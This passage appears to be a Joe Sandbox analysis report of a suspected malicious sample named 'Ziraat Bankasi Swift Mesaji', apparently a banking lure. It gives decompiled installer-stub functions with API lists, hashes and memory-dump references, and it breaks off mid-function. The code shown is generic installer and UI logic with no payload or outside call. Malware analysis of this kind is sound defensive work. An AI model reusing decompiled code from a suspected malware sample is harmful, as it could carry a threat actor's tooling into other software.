                                  • API String ID: 415043291-0
                                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040573D(CHAR* _a4) {
                                  				signed char _t3;
                                  
                                  				_t3 = GetFileAttributesA(_a4); // executed
                                  				if(_t3 != 0xffffffff) {
                                  					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                  				}
                                  				return _t3;
                                  			}




                                  0x00405741
                                  0x0040574a
                                  0x00000000
                                  0x00405753
                                  0x00405759

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                  • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                                  • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                  • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004031A8(void* _a4, long _a8) {
                                  				int _t6;
                                  				long _t10;
                                  
                                  				_t10 = _a8;
                                  				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                  				if(_t6 == 0 || _a8 != _t10) {
                                  					return 0;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}





                                  0x004031ac
                                  0x004031bf
                                  0x004031c7
                                  0x00000000
                                  0x004031ce
                                  0x00000000
                                  0x004031d0

                                  APIs
                                  • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                  • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                                  • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                  • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004031DA(long _a4) {
                                  				long _t2;
                                  
                                  				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                  				return _t2;
                                  			}




                                  0x004031e8
                                  0x004031ee

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                  • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                  • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                  • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 95%
                                  			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                  				struct HWND__* _v8;
                                  				long _v12;
                                  				struct tagRECT _v28;
                                  				void* _v36;
                                  				signed int _v40;
                                  				int _v44;
                                  				int _v48;
                                  				signed int _v52;
                                  				int _v56;
                                  				void* _v60;
                                  				void* _v68;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t87;
                                  				unsigned int _t92;
                                  				int _t94;
                                  				int _t95;
                                  				void* _t101;
                                  				intOrPtr _t112;
                                  				intOrPtr _t123;
                                  				struct HWND__* _t127;
                                  				int _t149;
                                  				int _t150;
                                  				struct HWND__* _t154;
                                  				struct HWND__* _t158;
                                  				struct HMENU__* _t160;
                                  				long _t162;
                                  				void* _t163;
                                  				short* _t164;
                                  
                                  				_t154 =  *0x423684;
                                  				_t149 = 0;
                                  				_v8 = _t154;
                                  				if(_a8 != 0x110) {
                                  					if(_a8 == 0x405) {
                                  						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                  					}
                                  					if(_a8 != 0x111) {
                                  						L17:
                                  						if(_a8 != 0x404) {
                                  							L25:
                                  							if(_a8 != 0x7b || _a12 != _t154) {
                                  								goto L20;
                                  							} else {
                                  								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                  								_a8 = _t87;
                                  								if(_t87 <= _t149) {
                                  									L37:
                                  									return 0;
                                  								}
                                  								_t160 = CreatePopupMenu();
                                  								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                                  								_t92 = _a16;
                                  								if(_t92 != 0xffffffff) {
                                  									_t150 = _t92;
                                  									_t94 = _t92 >> 0x10;
                                  								} else {
                                  									GetWindowRect(_t154,  &_v28);
                                  									_t150 = _v28.left;
                                  									_t94 = _v28.top;
                                  								}
                                  								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                  								_t162 = 1;
                                  								if(_t95 == 1) {
                                  									_v60 = _t149;
                                  									_v48 = 0x420498;
                                  									_v44 = 0xfff;
                                  									_a4 = _a8;
                                  									do {
                                  										_a4 = _a4 - 1;
                                  										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                  									} while (_a4 != _t149);
                                  									OpenClipboard(_t149);
                                  									EmptyClipboard();
                                  									_t101 = GlobalAlloc(0x42, _t162);
                                  									_a4 = _t101;
                                  									_t163 = GlobalLock(_t101);
                                  									do {
                                  										_v48 = _t163;
                                  										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                  										 *_t164 = 0xa0d;
                                  										_t163 = _t164 + 2;
                                  										_t149 = _t149 + 1;
                                  									} while (_t149 < _a8);
                                  									GlobalUnlock(_a4);
                                  									SetClipboardData(1, _a4);
                                  									CloseClipboard();
                                  								}
                                  								goto L37;
                                  							}
                                  						}
                                  						if( *0x42366c == _t149) {
                                  							ShowWindow( *0x423ea8, 8);
                                  							if( *0x423f2c == _t149) {
                                  								_t112 =  *0x41fc68; // 0x0
                                  								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                                  							}
                                  							E00403E10(1);
                                  							goto L25;
                                  						}
                                  						 *0x41f860 = 2;
                                  						E00403E10(0x78);
                                  						goto L20;
                                  					} else {
                                  						if(_a12 != 0x403) {
                                  							L20:
                                  							return E00403E9E(_a8, _a12, _a16);
                                  						}
                                  						ShowWindow( *0x423670, _t149);
                                  						ShowWindow(_t154, 8);
                                  						E00403E6C(_t154);
                                  						goto L17;
                                  					}
                                  				}
                                  				_v52 = _v52 | 0xffffffff;
                                  				_v40 = _v40 | 0xffffffff;
                                  				_v60 = 2;
                                  				_v56 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t123 =  *0x423eb0;
                                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                  				 *0x423670 = GetDlgItem(_a4, 0x403);
                                  				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                                  				_t127 = GetDlgItem(_a4, 0x3f8);
                                  				 *0x423684 = _t127;
                                  				_v8 = _t127;
                                  				E00403E6C( *0x423670);
                                  				 *0x423674 = E004046C5(4);
                                  				 *0x42368c = 0;
                                  				GetClientRect(_v8,  &_v28);
                                  				_v52 = _v28.right - GetSystemMetrics(0x15);
                                  				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                  				if(_a8 >= 0) {
                                  					SendMessageA(_v8, 0x1001, 0, _a8);
                                  					SendMessageA(_v8, 0x1026, 0, _a8);
                                  				}
                                  				if(_a12 >= _t149) {
                                  					SendMessageA(_v8, 0x1024, _t149, _a12);
                                  				}
                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                  				_push(0x1b);
                                  				E00403E37(_a4);
                                  				if(( *0x423eb8 & 0x00000003) != 0) {
                                  					ShowWindow( *0x423670, _t149);
                                  					if(( *0x423eb8 & 0x00000002) != 0) {
                                  						 *0x423670 = _t149;
                                  					} else {
                                  						ShowWindow(_v8, 8);
                                  					}
                                  					E00403E6C( *0x423668);
                                  				}
                                  				_t158 = GetDlgItem(_a4, 0x3ec);
                                  				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                  				if(( *0x423eb8 & 0x00000004) != 0) {
                                  					SendMessageA(_t158, 0x409, _t149, _a12);
                                  					SendMessageA(_t158, 0x2001, _t149, _a8);
                                  				}
                                  				goto L37;
                                  			}

































                                  0x00404f6a
                                  0x00404f70
                                  0x00404f79
                                  0x00404f7c
                                  0x00405114
                                  0x00405138
                                  0x00405138
                                  0x0040514b
                                  0x00405169
                                  0x00405170
                                  0x004051c7
                                  0x004051cb
                                  0x00000000
                                  0x004051d2
                                  0x004051da
                                  0x004051e2
                                  0x004051e5
                                  0x004052de
                                  0x00000000
                                  0x004052de
                                  0x004051f4
                                  0x00405200
                                  0x00405206
                                  0x0040520c
                                  0x00405221
                                  0x00405227
                                  0x0040520e
                                  0x00405213
                                  0x00405219
                                  0x0040521c
                                  0x0040521c
                                  0x00405237
                                  0x0040523f
                                  0x00405242
                                  0x0040524b
                                  0x0040524e
                                  0x00405255
                                  0x0040525c
                                  0x00405264
                                  0x00405264
                                  0x0040527b
                                  0x0040527b
                                  0x00405282
                                  0x00405288
                                  0x00405291
                                  0x00405298
                                  0x004052a1
                                  0x004052a3
                                  0x004052a6
                                  0x004052b5
                                  0x004052b7
                                  0x004052bd
                                  0x004052be
                                  0x004052bf
                                  0x004052c7
                                  0x004052d2
                                  0x004052d8
                                  0x004052d8
                                  0x00000000
                                  0x00405242
                                  0x004051cb
                                  0x00405178
                                  0x004051a8
                                  0x004051b0
                                  0x004051b2
                                  0x004051bb
                                  0x004051bb
                                  0x004051c2
                                  0x00000000
                                  0x004051c2
                                  0x0040517c
                                  0x00405186
                                  0x00000000
                                  0x0040514d
                                  0x00405153
                                  0x0040518b
                                  0x00000000
                                  0x00405194
                                  0x0040515c
                                  0x00405161
                                  0x00405164
                                  0x00000000
                                  0x00405164
                                  0x0040514b
                                  0x00404f82
                                  0x00404f86
                                  0x00404f8f
                                  0x00404f96
                                  0x00404f99
                                  0x00404f9c
                                  0x00404f9f
                                  0x00404fa0
                                  0x00404fa1
                                  0x00404fba
                                  0x00404fbd
                                  0x00404fc7
                                  0x00404fd6
                                  0x00404fde
                                  0x00404fe6
                                  0x00404feb
                                  0x00404fee
                                  0x00404ffa
                                  0x00405003
                                  0x0040500c
                                  0x0040502f
                                  0x00405035
                                  0x00405046
                                  0x0040504b
                                  0x00405059
                                  0x00405067
                                  0x00405067
                                  0x0040506c
                                  0x0040507a
                                  0x0040507a
                                  0x0040507f
                                  0x00405082
                                  0x00405087
                                  0x00405093
                                  0x0040509c
                                  0x004050a9
                                  0x004050b8
                                  0x004050ab
                                  0x004050b0
                                  0x004050b0
                                  0x004050c4
                                  0x004050c4
                                  0x004050d8
                                  0x004050e1
                                  0x004050ea
                                  0x004050fa
                                  0x00405106
                                  0x00405106
                                  0x00000000

                                  APIs
                                  • GetDlgItem.USER32 ref: 00404FC0
                                  • GetDlgItem.USER32 ref: 00404FCF
                                  • GetClientRect.USER32 ref: 0040500C
                                  • GetSystemMetrics.USER32 ref: 00405014
                                  • SendMessageA.USER32 ref: 00405035
                                  • SendMessageA.USER32 ref: 00405046
                                  • SendMessageA.USER32 ref: 00405059
                                  • SendMessageA.USER32 ref: 00405067
                                  • SendMessageA.USER32 ref: 0040507A
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                                  • ShowWindow.USER32(?,00000008), ref: 004050B0
                                  • GetDlgItem.USER32 ref: 004050D1
                                  • SendMessageA.USER32 ref: 004050E1
                                  • SendMessageA.USER32 ref: 004050FA
                                  • SendMessageA.USER32 ref: 00405106
                                  • GetDlgItem.USER32 ref: 00404FDE
                                    • Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A
                                  • GetDlgItem.USER32 ref: 00405123
                                  • CreateThread.KERNEL32 ref: 00405131
                                  • CloseHandle.KERNEL32(00000000), ref: 00405138
                                  • ShowWindow.USER32(00000000), ref: 0040515C
                                  • ShowWindow.USER32(?,00000008), ref: 00405161
                                  • ShowWindow.USER32(00000008), ref: 004051A8
                                  • SendMessageA.USER32 ref: 004051DA
                                  • CreatePopupMenu.USER32 ref: 004051EB
                                  • AppendMenuA.USER32 ref: 00405200
                                  • GetWindowRect.USER32 ref: 00405213
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                                  • SendMessageA.USER32 ref: 00405272
                                  • OpenClipboard.USER32 ref: 00405282
                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                                  • GlobalLock.KERNEL32 ref: 0040529B
                                  • SendMessageA.USER32 ref: 004052AF
                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                                  • SetClipboardData.USER32 ref: 004052D2
                                  • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                                  • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                                  • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                                  • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				void* _v24;
                                  				long _v28;
                                  				int _v32;
                                  				signed int _v40;
                                  				int _v44;
                                  				signed int* _v56;
                                  				intOrPtr _v60;
                                  				signed int _v64;
                                  				long _v68;
                                  				void* _v72;
                                  				intOrPtr _v76;
                                  				intOrPtr _v80;
                                  				void* _v84;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				struct HWND__* _t182;
                                  				int _t196;
                                  				long _t202;
                                  				signed int _t206;
                                  				signed int _t217;
                                  				void* _t220;
                                  				void* _t221;
                                  				int _t227;
                                  				signed int _t232;
                                  				signed int _t233;
                                  				signed int _t240;
                                  				struct HBITMAP__* _t250;
                                  				void* _t252;
                                  				char* _t268;
                                  				signed char _t269;
                                  				long _t274;
                                  				int _t280;
                                  				signed int* _t281;
                                  				int _t282;
                                  				long _t283;
                                  				int _t285;
                                  				long _t286;
                                  				signed int _t287;
                                  				long _t288;
                                  				signed int _t291;
                                  				signed int _t298;
                                  				signed int _t300;
                                  				signed int _t302;
                                  				int* _t310;
                                  				void* _t311;
                                  				int _t315;
                                  				int _t316;
                                  				int _t317;
                                  				signed int _t318;
                                  				void* _t320;
                                  
                                  				_v12 = GetDlgItem(_a4, 0x3f9);
                                  				_t182 = GetDlgItem(_a4, 0x408);
                                  				_t280 =  *0x423ec8;
                                  				_t320 = SendMessageA;
                                  				_v8 = _t182;
                                  				_t315 = 0;
                                  				_v32 = _t280;
                                  				_v20 =  *0x423eb0 + 0x94;
                                  				if(_a8 != 0x110) {
                                  					L23:
                                  					if(_a8 != 0x405) {
                                  						_t289 = _a16;
                                  					} else {
                                  						_a12 = _t315;
                                  						_t289 = 1;
                                  						_a8 = 0x40f;
                                  						_a16 = 1;
                                  					}
                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                  						_v16 = _t289;
                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                  							if(( *0x423eb9 & 0x00000002) != 0) {
                                  								L41:
                                  								if(_v16 != _t315) {
                                  									_t232 = _v16;
                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                  									}
                                  									_t233 = _v16;
                                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                  										} else {
                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                  										}
                                  									}
                                  								}
                                  								goto L48;
                                  							}
                                  							if(_a8 == 0x413) {
                                  								L33:
                                  								_t289 = 0 | _a8 != 0x00000413;
                                  								_t240 = E004046F2(_v8, _a8 != 0x413);
                                  								if(_t240 >= _t315) {
                                  									_t93 = _t280 + 8; // 0x8
                                  									_t310 = _t240 * 0x418 + _t93;
                                  									_t289 =  *_t310;
                                  									if((_t289 & 0x00000010) == 0) {
                                  										if((_t289 & 0x00000040) == 0) {
                                  											_t298 = _t289 ^ 0x00000001;
                                  										} else {
                                  											_t300 = _t289 ^ 0x00000080;
                                  											if(_t300 >= 0) {
                                  												_t298 = _t300 & 0xfffffffe;
                                  											} else {
                                  												_t298 = _t300 | 0x00000001;
                                  											}
                                  										}
                                  										 *_t310 = _t298;
                                  										E0040117D(_t240);
                                  										_t289 = 1;
                                  										_a8 = 0x40f;
                                  										_a12 = 1;
                                  										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
                                  									}
                                  								}
                                  								goto L41;
                                  							}
                                  							_t289 = _a16;
                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                  								goto L41;
                                  							}
                                  							goto L33;
                                  						} else {
                                  							goto L48;
                                  						}
                                  					} else {
                                  						L48:
                                  						if(_a8 != 0x111) {
                                  							L56:
                                  							if(_a8 == 0x200) {
                                  								SendMessageA(_v8, 0x200, _t315, _t315);
                                  							}
                                  							if(_a8 == 0x40b) {
                                  								_t220 =  *0x420474;
                                  								if(_t220 != _t315) {
                                  									ImageList_Destroy(_t220);
                                  								}
                                  								_t221 =  *0x42048c;
                                  								if(_t221 != _t315) {
                                  									GlobalFree(_t221);
                                  								}
                                  								 *0x420474 = _t315;
                                  								 *0x42048c = _t315;
                                  								 *0x423f00 = _t315;
                                  							}
                                  							if(_a8 != 0x40f) {
                                  								L86:
                                  								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
                                  									_t316 = (0 | _a16 == 0x00000020) << 3;
                                  									ShowWindow(_v8, _t316);
                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                  								}
                                  								goto L89;
                                  							} else {
                                  								E004011EF(_t289, _t315, _t315);
                                  								if(_a12 != _t315) {
                                  									E0040140B(8);
                                  								}
                                  								if(_a16 == _t315) {
                                  									L73:
                                  									E004011EF(_t289, _t315, _t315);
                                  									_v32 =  *0x42048c;
                                  									_t196 =  *0x423ec8;
                                  									_v60 = 0xf030;
                                  									_v16 = _t315;
                                  									if( *0x423ecc <= _t315) {
                                  										L84:
                                  										InvalidateRect(_v8, _t315, 1);
                                  										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
                                  											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                                  										}
                                  										goto L86;
                                  									}
                                  									_t281 = _t196 + 8;
                                  									do {
                                  										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                  										if(_t202 != _t315) {
                                  											_t291 =  *_t281;
                                  											_v68 = _t202;
                                  											_v72 = 8;
                                  											if((_t291 & 0x00000001) != 0) {
                                  												_v72 = 9;
                                  												_v56 =  &(_t281[4]);
                                  												_t281[0] = _t281[0] & 0x000000fe;
                                  											}
                                  											if((_t291 & 0x00000040) == 0) {
                                  												_t206 = (_t291 & 0x00000001) + 1;
                                  												if((_t291 & 0x00000010) != 0) {
                                  													_t206 = _t206 + 3;
                                  												}
                                  											} else {
                                  												_t206 = 3;
                                  											}
                                  											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                  											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                  											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                  										}
                                  										_v16 = _v16 + 1;
                                  										_t281 =  &(_t281[0x106]);
                                  									} while (_v16 <  *0x423ecc);
                                  									goto L84;
                                  								} else {
                                  									_t282 = E004012E2( *0x42048c);
                                  									E00401299(_t282);
                                  									_t217 = 0;
                                  									_t289 = 0;
                                  									if(_t282 <= _t315) {
                                  										L72:
                                  										SendMessageA(_v12, 0x14e, _t289, _t315);
                                  										_a16 = _t282;
                                  										_a8 = 0x420;
                                  										goto L73;
                                  									} else {
                                  										goto L69;
                                  									}
                                  									do {
                                  										L69:
                                  										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                  											_t289 = _t289 + 1;
                                  										}
                                  										_t217 = _t217 + 1;
                                  									} while (_t217 < _t282);
                                  									goto L72;
                                  								}
                                  							}
                                  						}
                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                  							goto L89;
                                  						} else {
                                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                  							if(_t227 == 0xffffffff) {
                                  								goto L89;
                                  							}
                                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                  							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                  								_t283 = 0x20;
                                  							}
                                  							E00401299(_t283);
                                  							SendMessageA(_a4, 0x420, _t315, _t283);
                                  							_a12 = 1;
                                  							_a16 = _t315;
                                  							_a8 = 0x40f;
                                  							goto L56;
                                  						}
                                  					}
                                  				} else {
                                  					 *0x423f00 = _a4;
                                  					_t285 = 2;
                                  					_v28 = 0;
                                  					_v16 = _t285;
                                  					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
                                  					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                                  					 *0x420480 =  *0x420480 | 0xffffffff;
                                  					_v24 = _t250;
                                  					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                  					 *0x420474 = _t252;
                                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                  					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                  					}
                                  					DeleteObject(_v24);
                                  					_t286 = 0;
                                  					do {
                                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                  						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                  							if(_t286 != 0x20) {
                                  								_v16 = _t315;
                                  							}
                                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                                  						}
                                  						_t286 = _t286 + 1;
                                  					} while (_t286 < 0x21);
                                  					_t317 = _a16;
                                  					_t287 = _v16;
                                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                  					_push(0x15);
                                  					E00403E37(_a4);
                                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                  					_push(0x16);
                                  					E00403E37(_a4);
                                  					_t318 = 0;
                                  					_t288 = 0;
                                  					if( *0x423ecc <= 0) {
                                  						L19:
                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                  						goto L20;
                                  					} else {
                                  						_t311 = _v32 + 8;
                                  						_v24 = _t311;
                                  						do {
                                  							_t268 = _t311 + 0x10;
                                  							if( *_t268 != 0) {
                                  								_v60 = _t268;
                                  								_t269 =  *_t311;
                                  								_t302 = 0x20;
                                  								_v84 = _t288;
                                  								_v80 = 0xffff0002;
                                  								_v76 = 0xd;
                                  								_v64 = _t302;
                                  								_v40 = _t318;
                                  								_v68 = _t269 & _t302;
                                  								if((_t269 & 0x00000002) == 0) {
                                  									if((_t269 & 0x00000004) == 0) {
                                  										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                  									} else {
                                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                  									}
                                  								} else {
                                  									_v76 = 0x4d;
                                  									_v44 = 1;
                                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                  									_v28 = 1;
                                  									 *( *0x42048c + _t318 * 4) = _t274;
                                  									_t288 =  *( *0x42048c + _t318 * 4);
                                  								}
                                  							}
                                  							_t318 = _t318 + 1;
                                  							_t311 = _v24 + 0x418;
                                  							_v24 = _t311;
                                  						} while (_t318 <  *0x423ecc);
                                  						if(_v28 != 0) {
                                  							L20:
